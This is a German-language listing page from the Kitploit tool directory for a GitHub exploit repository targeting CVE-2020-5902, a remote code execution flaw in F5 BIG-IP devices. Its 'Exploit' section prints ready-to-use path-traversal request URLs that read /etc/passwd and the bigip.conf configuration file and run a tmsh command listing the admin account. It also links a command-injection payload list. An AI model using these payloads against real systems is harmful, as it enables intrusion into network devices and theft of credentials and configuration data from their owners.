Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RCE-CVE-2020-5902 — BIG-IP F5 Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/jsec1337/rce-cve-2020-5902
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubjsec1337/rce-cve-2020-5902

RCE-CVE-2020-5902

BIG-IP F5 Remote-Codeausführung

Repository anzeigen
11vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE-CVE-2020-5902

BIG-IP F5 Remote Code Execution

Beschreibung

Diese Angriffe zielen auf BIG-IP, ein multifunktionales Netzwerkgerät von F5 Networks. BIG-IP-Geräte können als Traffic-Shaping-Systeme, Load Balancer, Firewalls, Zugangs-Gateways, Ratenbegrenzer oder SSL-Middleware konfiguriert werden.

Am Mittwoch veröffentlichte F5 Networks Patches und gab ein Sicherheitsbulletin zu einer „Remote Code Execution“-Schwachstelle in BIG-IP-Geräten heraus.

F5 gab an, dass die als CVE-2020-5902 geführte Schwachstelle es Angreifern ermöglichen könnte, die vollständige Kontrolle über ungepatchte Systeme zu übernehmen, die im Internet erreichbar sind.

root@kitploit:~
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10

Exploit

root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Tool herunterladen

NMAP-Prüfung

Payload RCE

https://github.com/payloadbox/command-injection-payload-list

Referenz

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/